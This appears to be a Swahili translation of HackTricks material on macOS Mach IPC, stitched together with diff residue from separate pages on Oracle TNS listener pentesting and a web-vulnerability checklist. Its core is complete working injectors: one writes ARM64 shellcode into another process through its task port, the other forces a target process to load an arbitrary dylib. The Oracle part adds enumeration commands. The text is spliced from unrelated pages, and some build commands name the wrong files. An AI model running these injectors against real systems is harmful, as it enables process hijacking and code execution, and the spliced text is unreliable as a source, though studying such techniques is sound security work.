Ili kufikia **mawasiliano ya pande mbili** kwa urahisi, mchakato unaweza kubainisha **bandari ya mach** katika **kichwa cha ujumbe** kinachoitwa _bandari ya majibu_ (**`msgh_local_port`**) ambapo **mpokeaji** wa ujumbe anaweza **kutuma jibu** kwa ujumbe huu. Bitflags katika **`msgh_bits`** zinaweza kutumika ku **onyesha** kwamba **haki ya tuma-mara moja** inapaswa kutolewa na kuhamasishwa kwa bandari hii (`MACH_MSG_TYPE_MAKE_SEND_ONCE`).
> [!TIP]
> Kumbuka kwamba aina hii ya mawasiliano ya pande mbili inatumika katika ujumbe wa XPC ambao unatarajia jibu (`xpc_connection_send_message_with_reply` na `xpc_connection_send_message_with_reply_sync`). Lakini **kwa kawaida bandari tofauti zinaundwa** kama ilivyoelezwa hapo awali ili kuunda mawasiliano ya pande mbili.
Sehemu nyingine za kichwa cha ujumbe ni:
- `msgh_size`: ukubwa wa pakiti nzima.
- `msgh_remote_port`: bandari ambayo ujumbe huu umetumwa.
- `msgh_voucher_port`: [mach vouchers](https://robert.sesek.com/2023/6/mach_vouchers.html).
- `msgh_id`: ID ya ujumbe huu, ambayo inatafsiriwa na mpokeaji.
> [!CAUTION]
> Kumbuka kwamba **ujumbe wa mach unatumwa kupitia \_bandari ya mach**\_, ambayo ni **mpokeaji mmoja**, **watumaji wengi** njia ya mawasiliano iliyojengwa ndani ya kernel ya mach. **Mchakato mwingi** unaweza **kutuma ujumbe** kwa bandari ya mach, lakini wakati wowote **mchakato mmoja tu unaweza kusoma** kutoka kwake.
### Orodhesha bandari
```bash
lsmp -p <pid>
```
Unaweza kufunga chombo hiki kwenye iOS kwa kukipakua kutoka [http://newosxbook.com/tools/binpack64-256.tar.gz](http://newosxbook.com/tools/binpack64-256.tar.gz)
### Mfano wa msimbo
Angalia jinsi **mjumbe** anavyo **pata** bandari, kuunda **haki ya kutuma** kwa jina `org.darlinghq.example` na kuisafirisha kwa **seva ya bootstrap** wakati mjumbe alipoomba **haki ya kutuma** ya jina hilo na kuitumia ili **kutuma ujumbe**.
{{#tabs}}
{{#tab name="receiver.c"}}
```c
// Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html
// gcc receiver.c -o receiver
#include <stdio.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>
int main() {
// Create a new port.
mach_port_t port;
kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
if (kr != KERN_SUCCESS) {
printf("mach_port_allocate() failed with code 0x%x\n", kr);
return 1;
}
printf("mach_port_allocate() created port right name %d\n", port);
// Give us a send right to this port, in addition to the receive right.
kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
if (kr != KERN_SUCCESS) {
printf("mach_port_insert_right() failed with code 0x%x\n", kr);
return 1;
}
printf("mach_port_insert_right() inserted a send right\n");
// Send the send right to the bootstrap server, so that it can be looked up by other processes.
kr = bootstrap_register(bootstrap_port, "org.darlinghq.example", port);
if (kr != KERN_SUCCESS) {
printf("bootstrap_register() failed with code 0x%x\n", kr);
return 1;
}
printf("bootstrap_register()'ed our port\n");
// Wait for a message.
struct {
mach_msg_header_t header;
char some_text[10];
int some_number;
mach_msg_trailer_t trailer;
} message;
kr = mach_msg(
&message.header, // Same as (mach_msg_header_t *) &message.
MACH_RCV_MSG, // Options. We're receiving a message.
0, // Size of the message being sent, if sending.
sizeof(message), // Size of the buffer for receiving.
port, // The port to receive a message on.
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL // Port for the kernel to send notifications about this message to.
);
if (kr != KERN_SUCCESS) {
printf("mach_msg() failed with code 0x%x\n", kr);
return 1;
}
printf("Got a message\n");
message.some_text[9] = 0;
printf("Text: %s, number: %d\n", message.some_text, message.some_number);
}
```
{{#endtab}}
{{#tab name="sender.c"}}
```c
// Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html
// gcc sender.c -o sender
#include <stdio.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>
int main() {
// Lookup the receiver port using the bootstrap server.
mach_port_t port;
kern_return_t kr = bootstrap_look_up(bootstrap_port, "org.darlinghq.example", &port);
if (kr != KERN_SUCCESS) {
printf("bootstrap_look_up() failed with code 0x%x\n", kr);
return 1;
}
printf("bootstrap_look_up() returned port right name %d\n", port);
// Construct our message.
struct {
mach_msg_header_t header;
char some_text[10];
int some_number;
} message;
message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
message.header.msgh_remote_port = port;
message.header.msgh_local_port = MACH_PORT_NULL;
strncpy(message.some_text, "Hello", sizeof(message.some_text));
message.some_number = 35;
// Send the message.
kr = mach_msg(
&message.header, // Same as (mach_msg_header_t *) &message.
MACH_SEND_MSG, // Options. We're sending a message.
sizeof(message), // Size of the message being sent.
0, // Size of the buffer for receiving.
MACH_PORT_NULL, // A port to receive a message on, if receiving.
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL // Port for the kernel to send notifications about this message to.
);
if (kr != KERN_SUCCESS) {
printf("mach_msg() failed with code 0x%x\n", kr);
return 1;
}
printf("Sent a message\n");
}
```
{{#endtab}}
{{#endtabs}}
### Bandari za Kipekee
- **Bandari ya mwenyeji**: Ikiwa mchakato una **privilege ya Kutuma** juu ya bandari hii anaweza kupata **taarifa** kuhusu **mfumo** (mfano `host_processor_info`).
- **Bandari ya haki ya mwenyeji**: Mchakato wenye **haki ya Kutuma** juu ya bandari hii unaweza kufanya **vitendo vya kipekee** kama kupakia nyongeza ya kernel. **Mchakato unahitaji kuwa root** ili kupata ruhusa hii.
- Zaidi ya hayo, ili kuita **`kext_request`** API inahitajika kuwa na haki nyingine **`com.apple.private.kext*`** ambazo zinatolewa tu kwa binaries za Apple.
- **Jina la kazi bandari:** Toleo lisilo na haki la _bandari ya kazi_. Linarejelea kazi, lakini haliruhusu kuidhibiti. Kitu pekee kinachonekana kupatikana kupitia hiyo ni `task_info()`.
- **Bandari ya kazi** (pia inajulikana kama bandari ya kernel)**:** Kwa ruhusa ya Kutuma juu ya bandari hii inawezekana kudhibiti kazi (kusoma/kandika kumbukumbu, kuunda nyuzi...).
- Piga `mach_task_self()` ili **kupata jina** la bandari hii kwa kazi ya mwitikio. Bandari hii ni **inherited** tu kupitia **`exec()`**; kazi mpya iliyoundwa kwa `fork()` inapata bandari mpya ya kazi (kama kesi maalum, kazi pia inapata bandari mpya ya kazi baada ya `exec()` katika binary ya suid). Njia pekee ya kuanzisha kazi na kupata bandari yake ni kufanya ["port swap dance"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) wakati wa kufanya `fork()`.
- Hizi ndizo vizuizi vya kufikia bandari (kutoka `macos_task_policy` kutoka binary `AppleMobileFileIntegrity`):
- Ikiwa programu ina **`com.apple.security.get-task-allow` entitlement** mchakato kutoka **mtumiaji yule yule unaweza kufikia bandari ya kazi** (kawaida huongezwa na Xcode kwa ajili ya ufuatiliaji). Mchakato wa **notarization** hautaruhusu kwa toleo la uzalishaji.
- Programu zenye **`com.apple.system-task-ports`** entitlement zinaweza kupata **bandari ya kazi kwa mchakato wowote**, isipokuwa kernel. Katika toleo za zamani ilijulikana kama **`task_for_pid-allow`**. Hii inatolewa tu kwa programu za Apple.
- **Root anaweza kufikia bandari za kazi** za programu **zisizokamilishwa** na **runtime iliyoimarishwa** (na sio kutoka Apple).
### Uingizaji wa Shellcode katika nyuzi kupitia Bandari ya Kazi
Unaweza kupata shellcode kutoka:
{{#ref}}
../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
{{#tabs}}
{{#tab name="mysleep.m"}}
```objectivec
// clang -framework Foundation mysleep.m -o mysleep
// codesign --entitlements entitlements.plist -s - mysleep
#import <Foundation/Foundation.h>
double performMathOperations() {
double result = 0;
for (int i = 0; i < 10000; i++) {
result += sqrt(i) * tan(i) - cos(i);
}
return result;
}
int main(int argc, const char * argv[]) {
@autoreleasepool {
NSLog(@"Process ID: %d", [[NSProcessInfo processInfo]
processIdentifier]);
while (true) {
[NSThread sleepForTimeInterval:5];
performMathOperations(); // Silent action
[NSThread sleepForTimeInterval:5];
}
}
return 0;
}
```
{{#endtab}}
{{#tab name="entitlements.plist"}}
```xml
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.get-task-allow</key>
<true/>
</dict>
</plist>
```
{{#endtab}}
{{#endtabs}}
**Kusanya** programu iliyopita na kuongeza **entitlements** ili uweze kuingiza msimbo na mtumiaji yule yule (ikiwa sivyo utahitaji kutumia **sudo**).
<details>
<summary>sc_injector.m</summary>
```objectivec
// gcc -framework Foundation -framework Appkit sc_injector.m -o sc_injector
#import <Foundation/Foundation.h>
#import <AppKit/AppKit.h>
#include <mach/mach_vm.h>
#include <sys/sysctl.h>
#ifdef __arm64__
kern_return_t mach_vm_allocate
(
vm_map_t target,
mach_vm_address_t *address,
mach_vm_size_t size,
int flags
);
kern_return_t mach_vm_write
(
vm_map_t target_task,
mach_vm_address_t address,
vm_offset_t data,
mach_msg_type_number_t dataCnt
);
#else
#include <mach/mach_vm.h>
#endif
#define STACK_SIZE 65536
#define CODE_SIZE 128
// ARM64 shellcode that executes touch /tmp/lalala
char injectedCode[] = "\xff\x03\x01\xd1\xe1\x03\x00\x91\x60\x01\x00\x10\x20\x00\x00\xf9\x60\x01\x00\x10\x20\x04\x00\xf9\x40\x01\x00\x10\x20\x08\x00\xf9\x3f\x0c\x00\xf9\x80\x00\x00\x10\xe2\x03\x1f\xaa\x70\x07\x80\xd2\x01\x00\x00\xd4\x2f\x62\x69\x6e\x2f\x73\x68\x00\x2d\x63\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x6c\x61\x6c\x61\x6c\x61\x00";
int inject(pid_t pid){
task_t remoteTask;
// Get access to the task port of the process we want to inject into
kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask);
if (kr != KERN_SUCCESS) {
fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr);
return (-1);
}
else{
printf("Gathered privileges over the task port of process: %d\n", pid);
}
// Allocate memory for the stack
mach_vm_address_t remoteStack64 = (vm_address_t) NULL;
mach_vm_address_t remoteCode64 = (vm_address_t) NULL;
kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS)
{
fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr));
return (-2);
}
else
{
fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64);
}
// Allocate memory for the code
remoteCode64 = (vm_address_t) NULL;
kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE );
if (kr != KERN_SUCCESS)
{
fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr));
return (-2);
}
// Write the shellcode to the allocated memory
kr = mach_vm_write(remoteTask, // Task port
remoteCode64, // Virtual Address (Destination)
(vm_address_t) injectedCode, // Source
0xa9); // Length of the source
if (kr != KERN_SUCCESS)
{
fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr));
return (-3);
}
// Set the permissions on the allocated code memory
kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS)
{
fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr));
return (-4);
}
// Set the permissions on the allocated stack memory
kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE);
if (kr != KERN_SUCCESS)
{
fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr));
return (-4);
}
// Create thread to run shellcode
struct arm_unified_thread_state remoteThreadState64;
thread_act_t remoteThread;
memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) );
remoteStack64 += (STACK_SIZE / 2); // this is the real stack
//remoteStack64 -= 8; // need alignment of 16
const char* p = (const char*) remoteCode64;
remoteThreadState64.ash.flavor = ARM_THREAD_STATE64;
remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT;
remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64;
remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64;
printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p );
kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64,
(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread );
if (kr != KERN_SUCCESS) {
fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr));
return (-3);
}
return (0);
}
pid_t pidForProcessName(NSString *processName) {
NSArray *arguments = @[@"pgrep", processName];
NSTask *task = [[NSTask alloc] init];
[task setLaunchPath:@"/usr/bin/env"];
[task setArguments:arguments];
NSPipe *pipe = [NSPipe pipe];
[task setStandardOutput:pipe];
NSFileHandle *file = [pipe fileHandleForReading];
[task launch];
NSData *data = [file readDataToEndOfFile];
NSString *string = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding];
return (pid_t)[string integerValue];
}
BOOL isStringNumeric(NSString *str) {
NSCharacterSet* nonNumbers = [[NSCharacterSet decimalDigitCharacterSet] invertedSet];
NSRange r = [str rangeOfCharacterFromSet: nonNumbers];
return r.location == NSNotFound;
}
int main(int argc, const char * argv[]) {
@autoreleasepool {
if (argc < 2) {
NSLog(@"Usage: %s <pid or process name>", argv[0]);
return 1;
}
NSString *arg = [NSString stringWithUTF8String:argv[1]];
pid_t pid;
if (isStringNumeric(arg)) {
pid = [arg intValue];
} else {
pid = pidForProcessName(arg);
if (pid == 0) {
NSLog(@"Error: Process named '%@' not found.", arg);
return 1;
}
else{
printf("Found PID of process '%s': %d\n", [arg UTF8String], pid);
}
}
inject(pid);
}
return 0;
}
```
</details>
```bash
gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject
./inject <pi or string>
```
### Dylib Injection katika thread kupitia Task port
Katika macOS **threads** zinaweza kudhibitiwa kupitia **Mach** au kutumia **posix `pthread` api**. Thread tuliyoitengeneza katika kuingiza awali, ilitengenezwa kwa kutumia Mach api, hivyo **siyo ya kufuata posix**.
Ilikuwa inawezekana **kuingiza shellcode rahisi** ili kutekeleza amri kwa sababu **haikuhitaji kufanya kazi na posix** zinazofuata apis, bali tu na Mach. **Kuingiza kwa kiwango cha juu zaidi** kutahitaji **thread** pia iwe **ya kufuata posix**.
Kwa hivyo, ili **kuboresha thread** inapaswa kuita **`pthread_create_from_mach_thread`** ambayo itaunda **pthread halali**. Kisha, hii pthread mpya inaweza **kuita dlopen** ili **kupakia dylib** kutoka mfumo, hivyo badala ya kuandika shellcode mpya ili kutekeleza vitendo tofauti, inawezekana kupakia maktaba maalum.
Unaweza kupata **esemble dylibs** katika (kwa mfano ile inayozalisha log na kisha unaweza kuisikiliza):
{{#ref}}
../../macos-dyld-hijacking-and-dyld_insert_libraries.md
{{#endref}}
<details>
<summary>dylib_injector.m</summary>
```objectivec
// gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector
// Based on http://newosxbook.com/src.jl?tree=listings&file=inject.c
#include <dlfcn.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <mach/mach.h>
#include <mach/error.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/sysctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <pthread.h>
#ifdef __arm64__
//#include "mach/arm/thread_status.h"
// Apple says: mach/mach_vm.h:1:2: error: mach_vm.h unsupported
// And I say, bullshit.
kern_return_t mach_vm_allocate
(
vm_map_t target,
mach_vm_address_t *address,
mach_vm_size_t size,
int flags
);
kern_return_t mach_vm_write
(
vm_map_t target_task,
mach_vm_address_t address,
vm_offset_t data,
mach_msg_type_number_t dataCnt
);
#else
#include <mach/mach_vm.h>
#endif
#define STACK_SIZE 65536
#define CODE_SIZE 128
char injectedCode[] =
// "\x00\x00\x20\xd4" // BRK X0 ; // useful if you need a break :)
// Call pthread_set_self
"\xff\x83\x00\xd1" // SUB SP, SP, #0x20 ; Allocate 32 bytes of space on the stack for local variables
"\xFD\x7B\x01\xA9" // STP X29, X30, [SP, #0x10] ; Save frame pointer and link register on the stack
"\xFD\x43\x00\x91" // ADD X29, SP, #0x10 ; Set frame pointer to current stack pointer
"\xff\x43\x00\xd1" // SUB SP, SP, #0x10 ; Space for the
"\xE0\x03\x00\x91" // MOV X0, SP ; (arg0)Store in the stack the thread struct
"\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 (arg1) = 0;
"\xA2\x00\x00\x10" // ADR X2, 0x14 ; (arg2)12bytes from here, Address where the new thread should start
"\x03\x00\x80\xd2" // MOVZ X3, 0 ; X3 (arg3) = 0;
"\x68\x01\x00\x58" // LDR X8, #44 ; load address of PTHRDCRT (pthread_create_from_mach_thread)
"\x00\x01\x3f\xd6" // BLR X8 ; call pthread_create_from_mach_thread
"\x00\x00\x00\x14" // loop: b loop ; loop forever
// Call dlopen with the path to the library
"\xC0\x01\x00\x10" // ADR X0, #56 ; X0 => "LIBLIBLIB...";
"\x68\x01\x00\x58" // LDR X8, #44 ; load DLOPEN
"\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 = 0;
"\x29\x01\x00\x91" // ADD x9, x9, 0 - I left this as a nop
"\x00\x01\x3f\xd6" // BLR X8 ; do dlopen()
// Call pthread_exit
"\xA8\x00\x00\x58" // LDR X8, #20 ; load PTHREADEXT
"\x00\x00\x80\xd2" // MOVZ X0, 0 ; X1 = 0;
"\x00\x01\x3f\xd6" // BLR X8 ; do pthread_exit
"PTHRDCRT" // <-
"PTHRDEXT" // <-
"DLOPEN__" // <-
"LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB"
"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00"
"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00"
"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00"
"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00"
"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" ;
int inject(pid_t pid, const char *lib) {
task_t remoteTask;
struct stat buf;
// Check if the library exists
int rc = stat (lib, &buf);
if (rc != 0)
{
fprintf (stderr, "Unable to open library file %s (%s) - Cannot inject\n", lib,strerror (errno));
//return (-9);
}
// Get access to the task port of the process we want to inject into
kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask);
if (kr != KERN_SUCCESS) {
fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr);
return (-1);
}
else{
printf("Gathered privileges over the task port of process: %d\n", pid);
}
// Allocate memory for the stack
mach_vm_address_t remoteStack64 = (vm_address_t) NULL;
mach_vm_address_t remoteCode64 = (vm_address_t) NULL;
kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS)
{
fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr));
return (-2);
}
else
{
fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64);
}
// Allocate memory for the code
remoteCode64 = (vm_address_t) NULL;
kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE );
if (kr != KERN_SUCCESS)
{
fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr));
return (-2);
}
// Patch shellcode
int i = 0;
char *possiblePatchLocation = (injectedCode );
for (i = 0 ; i < 0x100; i++)
{
// Patching is crude, but works.
//
extern void *_pthread_set_self;
possiblePatchLocation++;
uint64_t addrOfPthreadCreate = dlsym ( RTLD_DEFAULT, "pthread_create_from_mach_thread"); //(uint64_t) pthread_create_from_mach_thread;
uint64_t addrOfPthreadExit = dlsym (RTLD_DEFAULT, "pthread_exit"); //(uint64_t) pthread_exit;
uint64_t addrOfDlopen = (uint64_t) dlopen;
if (memcmp (possiblePatchLocation, "PTHRDEXT", 8) == 0)
{
memcpy(possiblePatchLocation, &addrOfPthreadExit,8);
printf ("Pthread exit @%llx, %llx\n", addrOfPthreadExit, pthread_exit);
}
if (memcmp (possiblePatchLocation, "PTHRDCRT", 8) == 0)
{
memcpy(possiblePatchLocation, &addrOfPthreadCreate,8);
printf ("Pthread create from mach thread @%llx\n", addrOfPthreadCreate);
}
if (memcmp(possiblePatchLocation, "DLOPEN__", 6) == 0)
{
printf ("DLOpen @%llx\n", addrOfDlopen);
memcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t));
}
if (memcmp(possiblePatchLocation, "LIBLIBLIB", 9) == 0)
{
strcpy(possiblePatchLocation, lib );
}
}
// Write the shellcode to the allocated memory
kr = mach_vm_write(remoteTask, // Task port
remoteCode64, // Virtual Address (Destination)
(vm_address_t) injectedCode, // Source
0xa9); // Length of the source
if (kr != KERN_SUCCESS)
{
fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr));
return (-3);
}
// Set the permissions on the allocated code memory
kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS)
{
fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr));
return (-4);
}
// Set the permissions on the allocated stack memory
kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE);
if (kr != KERN_SUCCESS)
{
fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr));
return (-4);
}
// Create thread to run shellcode
struct arm_unified_thread_state remoteThreadState64;
thread_act_t remoteThread;
memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) );
remoteStack64 += (STACK_SIZE / 2); // this is the real stack
//remoteStack64 -= 8; // need alignment of 16
const char* p = (const char*) remoteCode64;
remoteThreadState64.ash.flavor = ARM_THREAD_STATE64;
remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT;
remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64;
remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64;
printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p );
kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64,
(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread );
if (kr != KERN_SUCCESS) {
fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr));
return (-3);
}
return (0);
}
int main(int argc, const char * argv[])
{
if (argc < 3)
{
fprintf (stderr, "Usage: %s _pid_ _action_\n", argv[0]);
fprintf (stderr, " _action_: path to a dylib on disk\n");
exit(0);
}
pid_t pid = atoi(argv[1]);
const char *action = argv[2];
struct stat buf;
int rc = stat (action, &buf);
if (rc == 0) inject(pid,action);
else
{
fprintf(stderr,"Dylib not found\n");
}
}
```
</details>
```bash
gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector
./inject <pid-of-mysleep> </path/to/lib.dylib>
```
### Thread Hijacking via Task port <a href="#step-1-thread-hijacking" id="step-1-thread-hijacking"></a>
Katika mbinu hii, nyuzi ya mchakato inatekwa:
{{#ref}}
../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
{{#endref}}
## XPC
### Taarifa za Msingi
XPC, ambayo inasimama kwa XNU (kernel inayotumiwa na macOS) mawasiliano kati ya Mchakato, ni mfumo wa **mawasiliano kati ya michakato** kwenye macOS na iOS. XPC inatoa mekanizma ya kufanya **kuitana kwa njia salama, zisizo za kawaida kati ya michakato tofauti** kwenye mfumo. Ni sehemu ya mtindo wa usalama wa Apple, ikiruhusu **kuundwa kwa programu zenye ruhusa tofauti** ambapo kila **kipengele** kinakimbia na **ruhusa pekee zinazohitajika** kufanya kazi yake, hivyo kupunguza uharibifu unaoweza kutokea kutokana na mchakato ulioathirika.
Kwa maelezo zaidi kuhusu jinsi **mawasiliano haya yanavyofanya kazi** na jinsi **yanavyoweza kuwa na udhaifu**, angalia:
{{#ref}}
../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/
{{#endref}}
## MIG - Mach Interface Generator
MIG iliumbwa ili **kurahisisha mchakato wa uundaji wa Mach IPC**. Kimsingi **inazalisha msimbo unaohitajika** kwa seva na mteja kuwasiliana na tafsiri iliyotolewa. Hata kama msimbo uliozalishwa ni mbaya, mtengenezaji atahitaji tu kuingiza na msimbo wake utakuwa rahisi zaidi kuliko hapo awali.
Kwa maelezo zaidi angalia:
{{#ref}}
../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
{{#endref}}
## Marejeleo
- [https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)
- [https://knight.sc/malware/2019/03/15/code-injection-on-macos.html](https://knight.sc/malware/2019/03/15/code-injection-on-macos.html)
- [https://gist.github.com/knightsc/45edfc4903a9d2fa9f5905f60b02ce5a](https://gist.github.com/knightsc/45edfc4903a9d2fa9f5905f60b02ce5a)
- [https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
- [https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
{{#include ../../../../banners/hacktricks-training.md}}

61
src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md
View File

@ -1,61 +0,0 @@
# 1521,1522-1529 - Pentesting Oracle TNS Listener
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
Oracle database (Oracle DB) ni mfumo wa usimamizi wa hifadhidata wa uhusiano (RDBMS) kutoka kampuni ya Oracle (kutoka [hapa](https://www.techopedia.com/definition/8711/oracle-database)).
Wakati wa kuhesabu Oracle hatua ya kwanza ni kuzungumza na TNS-Listener ambayo kawaida inapatikana kwenye bandari ya kawaida (1521/TCP, -unaweza pia kupata wasikilizaji wa sekondari kwenye 15221529-).
```
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)
1748/tcp open oracle-tns Oracle TNS Listener
```
## Muhtasari
1. **Version Enumeration**: Tambua taarifa za toleo ili kutafuta udhaifu unaojulikana.
2. **TNS Listener Bruteforce**: Wakati mwingine inahitajika kuanzisha mawasiliano.
3. **SID Name Enumeration/Bruteforce**: Gundua majina ya hifadhidata (SID).
4. **Credential Bruteforce**: Jaribu kupata SID iliyogunduliwa.
5. **Code Execution**: Jaribu kuendesha msimbo kwenye mfumo.
Ili kutumia moduli za MSF oracle unahitaji kufunga baadhi ya utegemezi: [**Installation**](oracle-pentesting-requirements-installation.md)
## Posts
Angalia hizi posti:
- [https://secybr.com/posts/oracle-pentesting-best-practices/](https://secybr.com/posts/oracle-pentesting-best-practices/)
- [https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573)
- [https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/](https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/)
- [http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html](http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html)
## HackTricks Amri za Otomatiki
```
Protocol_Name: Oracle #Protocol Abbreviation if there is one.
Port_Number: 1521 #Comma separated if there is more than one.
Protocol_Description: Oracle TNS Listener #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for Oracle
Note: |
Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation
#great oracle enumeration tool
navigate to https://github.com/quentinhardy/odat/releases/
download the latest
tar -xvf odat-linux-libc2.12-x86_64.tar.gz
cd odat-libc2.12-x86_64/
./odat-libc2.12-x86_64 all -s 10.10.10.82
for more details check https://github.com/quentinhardy/odat/wiki
https://book.hacktricks.wiki/en/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html
Entry_2:
Name: Nmap
Description: Nmap with Oracle Scripts
Command: nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}
```
{{#include ../../banners/hacktricks-training.md}}

129
src/pentesting-web/web-vulnerabilities-methodology/README.md
View File

@ -1,129 +0,0 @@
# Web Vulnerabilities Methodology
{{#include ../../banners/hacktricks-training.md}}
Katika kila Web Pentest, kuna **sehemu kadhaa zilizofichwa na wazi ambazo zinaweza kuwa na udhaifu**. Chapisho hili linakusudia kuwa orodha ya kuangalia ili kuthibitisha kwamba umepitia udhaifu katika maeneo yote yanayowezekana.
## Proxies
> [!TIP]
> Sasa hivi **maombi ya mtandao** kwa kawaida **yanatumia** aina fulani ya **proxies za kati**, ambazo zinaweza (kutumika vibaya) kutekeleza udhaifu. Udhaifu huu unahitaji proxy yenye udhaifu kuwepo, lakini kwa kawaida pia unahitaji udhaifu mwingine katika backend.
- [ ] [**Abusing hop-by-hop headers**](../abusing-hop-by-hop-headers.md)
